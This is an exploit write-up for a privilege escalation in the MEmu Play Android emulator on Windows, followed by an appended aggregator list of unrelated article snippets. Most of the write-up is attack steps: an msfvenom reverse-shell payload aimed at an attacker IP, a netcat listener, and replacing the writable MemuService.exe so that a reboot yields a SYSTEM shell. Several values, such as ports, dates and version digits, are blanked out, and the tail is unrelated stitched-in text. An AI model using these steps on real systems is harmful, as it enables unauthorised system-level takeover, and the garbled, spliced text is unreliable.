# Exploit Title: Memu Play 6.0. - Privilege Escalation (PoC)

# Date: //

# Author: Alejandra Sánchez

# Vendor Homepage: https://www.memuplay.com/

# Software Link: https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release

# Version: 6.0.

# Tested on: Windows  / Windows 

# Description:

#  Memu Play 6.0. suffers from Privilege Escalation due to insecure file permissions

# Prerequisites

# Local, Low privilege access with restart capabilities

# Details

# By default the Authenticated Users group has the modify permission to ESM folders/files as shown below.

# A low privilege account is able to rename the MemuService.exe file located in this same path and replace

# with a malicious file that would connect back to an attacking computer giving system level privileges

# (nt authority\system) due to the service running as Local System.

# While a low privilege user is unable to restart the service through the application, a restart of the

# computer triggers the execution of the malicious file.

C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"

C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone:(I)(F)

                                                      BUILTIN\Administrators:(I)(F)

                                                      BUILTIN\Users:(I)(F)

                                                      NT AUTHORITY\SYSTEM:(I)(F)

Successfully processed  files; Failed processing  files

C:\>sc qc MEmuSVC

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MEmuSVC

        TYPE               :   WIN32_OWN_PROCESS

        START_TYPE         :    AUTO_START

        ERROR_CONTROL      :    NORMAL

        BINARY_PATH_NAME   : C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe

        LOAD_ORDER_GROUP   :

        TAG                : 

# Proof of Concept

. Generate malicious .exe on attacking machine

    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT= -f exe > /var/www/html/MemuService.exe

. Setup listener and ensure apache is running on attacking machine

    nc -lvp

    service apache2 start

. Download malicious .exe on victim machine

    Open browser to http://192.168.1.130/MemuService.exe and download

. Overwrite file and copy malicious .exe.

    Renename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak

    Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\

. Restart victim machine

. Reverse Shell on attacking machine opens

    C:\Windows\system32>whoami

    whoami

    nt authority\system

[EXP]Memu Play 6.0.7 - Privilege Escalation的更多相关文章

  1. [EXP]Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation

    Windows: DfMarshal Unsafe Unmarshaling Elevation of Privilege (Master) Platform: Windows (not tested ...

  2. karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850

    catalog . 程序功能概述 . 感染文件 . 前置知识 . 获取ROOT权限: Linux Kernel <= - Local Privilege Escalation 1. 程序功能概述 ...

  3. Linux/Unix System Level Attack、Privilege Escalation(undone)

    目录 . How To Start A System Level Attack . Remote Access Attack . Local Access Attack . After Get Roo ...

  4. FreeBSD Intel SYSRET Kernel Privilege Escalation Exploit

    /* * FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit * Author by CurcolHekerLink * * Th ...

  5. Basic Linux Privilege Escalation

    (Linux) privilege escalation is all about: Collect - Enumeration, more enumeration and some more enu ...

  6. CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC

    /**  * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC  *  * Vitaly Nikolenko  * http://ha ...

  7. OSCP Learning Notes - Privilege Escalation

    Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https:// ...

  8. Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)

    In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which ...

  9. [EXP]Microsoft Windows 10 - XmlDocument Insecure Sharing Privilege Escalation

    Windows: XmlDocument Insecure Sharing Elevation of Privilege Platform: Windows (almost certainly ear ...

随机推荐

  1. IP路由配置之---------配置PPP

    实验设备:两台华三路由器,两台PC,一条V.35线 PPP是数据链路层的协议,链路层的协议有很多如帧中继fr等 实验一,PAP验证(是一种以明码传送用户名和密码的验证方式) 步骤一,在主验证方设置一个 ...

  2. python 网络编程 tcp和udp 协议

    1. 网络通信协议 osi七层,tcp\ip五层 tcp\ip五层 arp协议:通过IP地址找到mac地址 2.tcp和udp的区别 tcp协议:面向连接,消息可靠,相对udp来讲,传输速度慢,消息是 ...

  3. 最小生成树求最大比率 UVALive - 5713

    题目链接:https://vjudge.net/problem/UVALive-5713 题意:给出t组数据,每组数据第一行给出一个n,表示点的数量,接下来n行,每行有三个数字,分别是点的坐标x,y和 ...

  4. Python开发【第五篇】:模块

    递归的案例:阶乘 1*2*3*4*5*6*7- def func(num):     if num == 1:         return 1     return num * func(num - ...

  5. C#删除文件夹以及删除文件

    public static void DelectDir(string srcPath) { try { DirectoryInfo dir = new DirectoryInfo(srcPath); ...

  6. 使用es6的then()方法封装jquery的ajax请求

    使用场景: jsp页面中使用jquery的ajax请求比较频繁,以前vue框架的项目用过axios,所以就想着用then()封装一个公共请求的方法,这样每次请求就不用那么麻烦的写一大堆请求参数了. 示 ...

  7. 【python深入】获取对象类型及属性

    在python中,查看当前的对象所能够调用的所有方法? 查看类型可以通过type,也可以通过isinstance方法,查看属性可以通过dir() 下面是对type的介绍: ————>基本类型的判 ...

  8. linux后台运行命令:&和nohup

    常用后台运行命令包含:&和nohup 一.& 使用 当在前台运行某个作业时,终端被该作业占据:可以在命令后面加上& 实现后台运行.例如:sh test.sh & 适合在 ...

  9. java命令分析线程死锁以及内存泄漏

    一.介绍 jstack是java虚拟机自带的一种堆栈跟踪工具.jstack用于打印出给定的java进程ID或core file或远程调试服务的Java堆栈信息,如果是在64位机器上,需要指定选项&qu ...

  10. Add-Migration : 无法将“Add-Migration”项识别为 cmdlet、函数、脚本文件或可运行程序的名称

    解决办法: PM>Import-Module C:\Users\Administrator.MACKJON\.nuget\packages\entityframework\6.2.0\tools ...